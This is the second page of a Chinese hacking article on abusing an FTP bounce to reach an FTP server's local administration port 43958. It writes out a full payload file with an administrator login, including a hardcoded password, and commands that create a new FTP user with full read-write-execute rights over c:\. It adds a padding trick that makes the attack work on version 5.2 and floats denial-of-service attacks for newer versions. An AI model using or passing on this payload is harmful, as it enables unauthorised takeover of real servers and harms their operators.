利用反弹攻击也可以发送任意数据，把要发送的数据写到文件中然后RETR就行了。既然可以发送任意数据，当然包括向43958端口发送添加有执行权限的FTP用户的命令咯。这真是个令人兴奋的主意。

以下内容保存为test.txt并传到FTP根目录：

user LocalAdministrator

Pass #l@$ak#.lk;0@P

SITE MAINTENANCE

-SETUSERSETUP

-IP=0.0.0.0

-PortNo=21

-User=lake

-Password=admin123

-HomeDir=c:\

-LoginMesFile=

-Disable=0

-RelPaths=1

-NeedSecure=0

-HideHidden=0

-AlwaysAllowLogin=0

-ChangePassword=0

-QuotaEnable=0

-MaxUsersLoginPerIP=-1

-SpeedLimitUp=0

-SpeedLimitDown=0

-MaxNrUsers=-1

-IdleTimeOut=600

-SessionTimeOut=-1

-Expire=0

-RatioUp=1

-RatioDown=1

-RatiosCredit=0

-QuotaCurrent=0

-QuotaMaximum=0

-Maintenance=None

-PasswordType=Regular

-Ratios=None

Access=c:\|RWAMELCDP


然后retr test.txt，添加用户的数据就发过去了。

每次都莫名其妙的添加失败，后来试验多次才发现是由于数据发送太快43958端口那边还没来得及响应连接就就关闭了。解决办法是在test.txt文件前面添加许多无用数据，当文件达到1M多的时候，哈哈，成功了！

以上是在5.2版本的情况，但在6.3版本上，情况不妙，43958端口限制了接收数据大小，几十K都不行了，何况一个1M的大文件呢。

这个地方一直没想到好的解决办法，似乎有两点思路供参考：

1、 上传/下载大文件，降低其处理速度

2、 对FTP服务器进行拒绝服务攻击，消耗资源降低处理速度

以上只是猜想没有去实践，姑且叫“lake2猜想”吧，谁把它解决了，我请吃饭哦

上一页  [1] [2]